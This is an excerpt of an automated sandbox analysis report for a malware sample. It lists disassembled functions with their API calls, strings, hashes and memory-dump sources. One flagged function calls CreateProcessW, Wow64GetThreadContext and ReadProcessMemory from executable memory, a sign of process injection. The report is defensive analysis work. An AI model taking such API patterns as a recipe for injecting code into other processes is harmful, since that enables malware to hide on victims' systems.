Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: e12d3699157ed522373a9c6598b4b5b430320c1e0cdd8312ea3d440cb485dafa
Instruction ID: 89deda876913a1a8087184d99beb7911a355133d9146999c29091959b336447a
Opcode Fuzzy Hash: e12d3699157ed522373a9c6598b4b5b430320c1e0cdd8312ea3d440cb485dafa
Instruction Fuzzy Hash: 3A113D70B00235ABDB11BF73BC4266F36B4AF05354B95895BE414C7281EB3CCA419779

Function 0041D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0041D28B,SwapMouseButtons,00000004,?), ref: 0041D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0041D28B,SwapMouseButtons,00000004,?,?,?,?,0041C865), ref: 0041D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0041D28B,SwapMouseButtons,00000004,?,?,?,?,0041C865), ref: 0041D2FF

Strings

Control Panel\Mouse, xrefs: 0041D2BA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 2ab266b0ece269c1616b8b7b238a33a0ffe188f22c2a12cea562aeff6cf6730d
Instruction ID: 0cd1190555930828b12ec140491f6cbda27ebd5e95af48670a4612518318c08c
Opcode Fuzzy Hash: 2ab266b0ece269c1616b8b7b238a33a0ffe188f22c2a12cea562aeff6cf6730d
Instruction Fuzzy Hash: EC117CB5A11208BFDB118F64CC84EEF7BB8EF05744F10486AE801D7250D735AE819B68

Function 009B3FC8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 009B4783
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 009B4819
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 009B483B

Memory Dump Source

Source File: 00000000.00000002.1655918152.00000000009B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000970000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097A000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097E000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000995000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655930012.00000000009B7000.00000004.00000020.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_ZsRFRjkt9q.jbxd

Yara matches

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
Instruction ID: 56452493b06e85cd5331e3bfb1f15b597af02689926ca0fe0c3dae03fd520838
Opcode Fuzzy Hash: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
Instruction Fuzzy Hash: 06621C30A14618DBEB24CFA4C940BDEB376EF58700F1091A9D20DEB391E7799E81DB59

Function 0042365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 004236B7
_memcpy_s.LIBCMT ref: 00423729
__filbuf.LIBCMT ref: 004237AA
_memset.LIBCMT ref: 004237EE

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction ID: 2ebd63b5f1109b17f0c2738a0f9f126dfcc81151958d9025ba2ca9ad80a75854
Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction Fuzzy Hash: F351E8B0B00225ABCF249F69A88455F77B5AF40325F64862FF825963D0D77C9F51CB48

Function 0044C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00404517: _fseek.LIBCMT ref: 0040452F

Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C65D
Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C670

_free.LIBCMT ref: 0044C4DD
_free.LIBCMT ref: 0044C4E4
_free.LIBCMT ref: 0044C54F

Part of subcall function 00421C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00427A85), ref: 00421CB1
Part of subcall function 00421C9D: GetLastError.KERNEL32(00000000,?,00427A85), ref: 00421CC3

_free.LIBCMT ref: 0044C557

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction ID: 674951708a286eb07b9171a8a69b16656f8ff281423f2ed36709ed89db711628
Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction Fuzzy Hash: 7E515FF5A04218AFDB149F65DC81AADBBB9EF48304F1000AEB219A3291DB755A80CF5D

Function 0044C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0044C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0044C746

Strings

aut, xrefs: 0044C740

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 3d2e6316c8f3a47ad6dc190deda9ae84468cfd82ede16fcca1fefbdffebd8a43
Instruction ID: 208516855a03f89cd35dcfacd4225edbf1aaece69b415c0056d3480ee9c56843
Opcode Fuzzy Hash: 3d2e6316c8f3a47ad6dc190deda9ae84468cfd82ede16fcca1fefbdffebd8a43
Instruction Fuzzy Hash: 81D05E7190030EBBDB10AB94DC0EFCA776C9700704F0005A17650A50F1DAB4E6998B69

Function 0045F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ed629ad32a379d639f331eff032c05424b95fb1a9cffe0e5a96631345af4bda
Instruction ID: b3827f22a9b40117375a449595afde1625f4abf3f7e4d7e9dd60fbd75d6536de
Opcode Fuzzy Hash: 0ed629ad32a379d639f331eff032c05424b95fb1a9cffe0e5a96631345af4bda
Instruction Fuzzy Hash: AEF169716083019FC710DF25C881B5EB7E5BF88318F14892EF9959B392DB78E949CB86

Function 0042395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00423973

Part of subcall function 004281C2: __NMSG_WRITE.LIBCMT ref: 004281E9
Part of subcall function 004281C2: __NMSG_WRITE.LIBCMT ref: 004281F3

__NMSG_WRITE.LIBCMT ref: 0042397A

Part of subcall function 0042821F: GetModuleFileNameW.KERNEL32(00000000,004C0312,00000104,00000000,00000001,00000000), ref: 004282B1
Part of subcall function 0042821F: ___crtMessageBoxW.LIBCMT ref: 0042835F

Part of subcall function 00421145: ___crtCorExitProcess.LIBCMT ref: 0042114B
Part of subcall function 00421145: ExitProcess.KERNEL32 ref: 00421154

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

RtlAllocateHeap.NTDLL(00970000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 037137f005a41d3e7f23448d6c867b3c8b4c2edbc04952c02118ab1723008725
Instruction ID: 55fc1677af57a8a7660136eab561fac32ed193775503e2d42985e710cb399e89
Opcode Fuzzy Hash: 037137f005a41d3e7f23448d6c867b3c8b4c2edbc04952c02118ab1723008725
Instruction Fuzzy Hash: 9701D6B13452319AE6113F36FC42B2F23689F82729BA0002FF505D7292DBBC9D80866D

Function 0044C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0044C385,?,?,?,?,?,00000004), ref: 0044C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0044C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0044C708
CloseHandle.KERNEL32(00000000,?,0044C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0044C70F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: a222b55bfb7e3c9122e2c3c1e0a00ac8846e0e3ba4c61acd4eec9770901b3ece
Instruction ID: 494393b69a2909d6cdb43eca47a58c7b459d0d0b41777f9665b8bdb17d821ec9
Opcode Fuzzy Hash: a222b55bfb7e3c9122e2c3c1e0a00ac8846e0e3ba4c61acd4eec9770901b3ece
Instruction Fuzzy Hash: D1E08632542214B7E7212B54AC4DFCE7B18AF05771F104524FB14691E097B12911879C

Function 0044BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044BB72

Part of subcall function 00421C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00427A85), ref: 00421CB1
Part of subcall function 00421C9D: GetLastError.KERNEL32(00000000,?,00427A85), ref: 00421CC3

_free.LIBCMT ref: 0044BB83
_free.LIBCMT ref: 0044BB95

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction ID: fb99fa3189b7cf6fe02a1e9cca191fa87ce96732a0e011a83902eecb09c11a36
Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction Fuzzy Hash: 08E012A574179146EA24697B7E44EB313CCCF14355B54081FB459E7646CF2CF84085EC

Function 00402322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 004022A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00402303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004025A1
CoInitialize.OLE32(00000000), ref: 00402618
CloseHandle.KERNEL32(00000000), ref: 0047503A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Handle$ClipboardCloseFormatInitializeRegister
String ID:
API String ID: 458326420-0
Opcode ID: 8a4b1e56580051f76ee24fd406250ec50a017d9c58e81692b5d0feeee1738c61
Instruction ID: 467a5c185213abbeff6f391a9cbeb45029f0b355c3efb32a313897462e65bf95
Opcode Fuzzy Hash: 8a4b1e56580051f76ee24fd406250ec50a017d9c58e81692b5d0feeee1738c61
Instruction Fuzzy Hash: 3F71B2B89012818BD384EF5AA994D95BBA4FB5B34879081BFD50AE72B3CB784414CF1C

Function 0044BBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0044BC18

Strings

EA06, xrefs: 0044BC46

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 5e4ef98dac258dcd6dc7d24bb0e1092f7aa42f21680ac890ea3e5784da56113c
Instruction ID: bf38d91aa226aab278e2a3b6eae51bb72c520540564fadadbe9b8507a3aecb82
Opcode Fuzzy Hash: 5e4ef98dac258dcd6dc7d24bb0e1092f7aa42f21680ac890ea3e5784da56113c
Instruction Fuzzy Hash: 7E01F5729042187EDB28CBA9C856FEEBBF8DB05305F00415FF592D6181E5B8E7088B64

Function 00403A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

745EC8D0.UXTHEME ref: 00403A73

Part of subcall function 00421405: __lock.LIBCMT ref: 0042140B

Part of subcall function 00403ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00403AF3
Part of subcall function 00403ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00403B08

Part of subcall function 00403D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00403AA3,?), ref: 00403D45
Part of subcall function 00403D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00403AA3,?), ref: 00403D57
Part of subcall function 00403D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C1148,004C1130,?,?,?,?,00403AA3,?), ref: 00403DC8
Part of subcall function 00403D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00403AA3,?), ref: 00403E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00403AB3

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
String ID:
API String ID: 3809921791-0
Opcode ID: 083c9a419650eb7b3c487a3d42e90ae60b002b2ca7067078e9a128b45e1d4eb7
Instruction ID: 5a1e6fac7f7e4f5efe05a10f66e6517c88bf61964affef9997ff0f491c4f9aa6
Opcode Fuzzy Hash: 083c9a419650eb7b3c487a3d42e90ae60b002b2ca7067078e9a128b45e1d4eb7
Instruction Fuzzy Hash: 6911AC719043409FC300EF2AE945D0EBBE9EF95310F00892FF589832B2DBB49591CB9A

Function 0042E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0042EA29
__close_nolock.LIBCMT ref: 0042EA42

Part of subcall function 00427BDA: __getptd_noexit.LIBCMT ref: 00427BDA

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 8322a7b743970971fcc84277e3b8d07b70dffa53242504ad88308bd68288346b
Instruction ID: 2416ae91324a54d1ce8793c95f0e759c3b4c3b44b30ce6d703663dc6d154f00d
Opcode Fuzzy Hash: 8322a7b743970971fcc84277e3b8d07b70dffa53242504ad88308bd68288346b
Instruction Fuzzy Hash: 0F11C6B2B056708AD711BFA6F84175D3A506F82339FA6438BE4205F1E2C7BC9C4186AD

Function 0041F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0042395C: __FF_MSGBANNER.LIBCMT ref: 00423973
Part of subcall function 0042395C: __NMSG_WRITE.LIBCMT ref: 0042397A
Part of subcall function 0042395C: RtlAllocateHeap.NTDLL(00970000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F

std::exception::exception.LIBCMT ref: 0041F51E
__CxxThrowException@8.LIBCMT ref: 0041F533

Part of subcall function 00426805: RaiseException.KERNEL32(?,?,0000000E,004B6A30,?,?,?,0041F538,0000000E,004B6A30,?,00000001), ref: 00426856

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 07ae70237271e5845d7a5d046d1afbaef3a230bfd21fc86a28fc04616e9042e9
Instruction ID: 7ad46e9193426c8d339f918b5cf2d99cac8a9eaef2833add56b360256c533eb5
Opcode Fuzzy Hash: 07ae70237271e5845d7a5d046d1afbaef3a230bfd21fc86a28fc04616e9042e9
Instruction Fuzzy Hash: 6EF0A43160422D67DB04BF9DE8019DF77A89F01358FB0842BF90992191DBB8A6C597AD

Function 00423839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00423868
__lock_file.LIBCMT ref: 00423889

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: e492847d1cbc599579f18d54b95229cc9b0f65ff89a9bc9901f5fa3c18fb59fc
Instruction ID: cec9c89e2de68f2a8ffe595d3962995eb89cd492c4fcb1b3750af5793757725a
Opcode Fuzzy Hash: e492847d1cbc599579f18d54b95229cc9b0f65ff89a9bc9901f5fa3c18fb59fc
Instruction Fuzzy Hash: 0701D871A00229ABCF21BFA6AC0159F7FB1AF80351F95421FF4145B261C73D8B11DB99

Function 004235E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__lock_file.LIBCMT ref: 00423629

Part of subcall function 00424E1C: __lock.LIBCMT ref: 00424E3F

__fclose_nolock.LIBCMT ref: 00423634

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: d1a9e36aabfa746b74cf3c7e94aba650e42a83fbd7dd24189ef5f7023581c49c
Instruction ID: e0ac56d962211a67bba08426c2dd1c536cda0567d662fd5b2e2ebd868d4dc1e9
Opcode Fuzzy Hash: d1a9e36aabfa746b74cf3c7e94aba650e42a83fbd7dd24189ef5f7023581c49c
Instruction Fuzzy Hash: 7AF09671B01234AAD721AF66A80276E7AB45F41339FA6814FE454AB3C1CB7C8A019A5D

Function 009B3FC5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 009B4783
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 009B4819
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 009B483B

Memory Dump Source

Source File: 00000000.00000002.1655918152.00000000009B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmpDownload File
